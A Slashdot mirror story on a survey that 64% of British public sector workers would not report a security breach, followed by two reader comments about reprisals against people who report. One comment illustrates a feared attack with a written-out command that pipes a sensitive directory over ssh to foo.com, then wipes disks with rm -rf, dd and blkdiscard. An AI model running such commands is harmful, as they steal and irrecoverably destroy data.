Slashdot Mirror

← Back to Stories (view on slashdot.org)

Survey: 2/3 of Public Sector Workers Wouldn't Report a Security Breach

Posted by Soulskill on from the time-to-hand-out-some-free-whistles dept.

An anonymous reader sends news of a survey of workers in the public sector conducted by Daisy Group, a British IT firm, which found that 64% of them would stay quiet about a security breach they noticed. The survey also found that 5% of workers admitted to disabling the password protection features on their work devices, and 20% said they don't update their passwords regularly. Daisy Group's Graham Harris said, "When it comes to data security, all too often organisations focus purely on IT processes and forget about the staff that will be using them. Human error is one of, if not the most likely source for data security issues, and fear of reprisal is a powerful force." 16% of respondents said they didn't know if data protection was an important part of their company's security practices.

2 of 150 comments (clear)

  1. Re:Reprisal.. by Austerity+Empowers · · Score: 4, Interesting

    Being fired is extreme, but in at least two companies I worked for, there was a strong "you broke it, you bought it" mentality to this sort of thing. If you found a security issue, you were expected to move across the corporation until it got fixed. Derailing your actual job, your personal life, and just about any hope of happiness until it got fixed. Of course you don't report it.

    The issue frequently is that IT is seen as the cost center to reduce most, so getting someone in IT to a) acknowledge it is an issue not user error/invalid use case requires champion effort, b) the IT guys that exist are marginally competent, the good ones are too expensive to work here full time, c) frequently users are told how dumb they are, so they aren't even sure if they've found an issue or "I must be doing something wrong", d) how did you find it in the first place? Were you doing something you shouldn't? HMMM?

  2. Re:Password updating by Anonymous Coward · · Score: 3, Interesting

    Posting AC on this just because this is a common topic:

    Updating passwords is a quick band-aid, mainly to show that after a breach, -something- is done. So, the first thing done is that the Windows admin runs:

    dsquery user | dsmod user -mustchpwd yes

    and the place says they have "taken proper security precautions".

    As for reporting security breaches, here in the US, one is bred from birth (if they are born in the 1990s or later) to "sit down, shut up, and stop snitchin'". A good example of what happens if one reports security holes is what happened to my GF's son, who was in high school at the time. He had a classmate who who found a security issue with the school's website and reported it. Well, he got arrested on the spot at the principal's office for a CFAA violation and expelled. Not for -using- the breach, but just -mentioning- it. The CFAA charge didn't stick (since he didn't use the exploit), but the expulsion did [1].

    This carries to the work world. I worked at one job where we were told to challenge people who were tailgating. One day, I was going in the building, had someone following me close behind. I refused to open the door and called security because the guy didn't have a badge, and refused to show ID. Well, he turned out to be some muckety muck with a high office, and I ended up getting handed my walking papers that day because "I didn't play well with senior company officials", even though policy was to disallow tailgating.

    So, it is no wonder why people are not going to go out of their way to report security related items. If one is in school, they get threatened with expulsion and arrest. In the work world, it is blacklisting, arrest, and loss of a job.

    The lack of resources put into security and the prompt punishing of people who "see something, say something" is part of why China is assraping us so hard when it comes to security. If someone mentions -anything- out of the ordinary, they get the Richard Jewel treatment, so in the school and work environment, it is just keep the head down and shut up.

    What can you do? I'm lucky to work at a place where they are responsive to security, but in most places, one might have to resort to anonymous tips to the FBI and other LEOs about the breach in order for anything to get done.

    I wonder what will happen long term when security breaches don't just constitute a "tar /home/SensitiveDataStash/*|ssh foo.com "cat - > foo.tar"', but following the offsite copy, a "rm -rf /home", followed by a "dd if=/dev/zero of=/dev/sda" if the drive is an array, HDD, or LUN or a "blkdiscard /dev/hda" if a SSD. Right now, companies don't give a rat's ass if they get broken into and data snarfed... but once the bad guys start destroying data, people will care. However, with the fact that any employees who might mention a security issue would get shitcanned, it is going to take a big company going out of business for security policies to actually be enacted that make sense. It may even take major loss of life.

    [1]: Irony is that the kid got his GED and his high school equivalency, and is doing far better than he would had he graduated HS.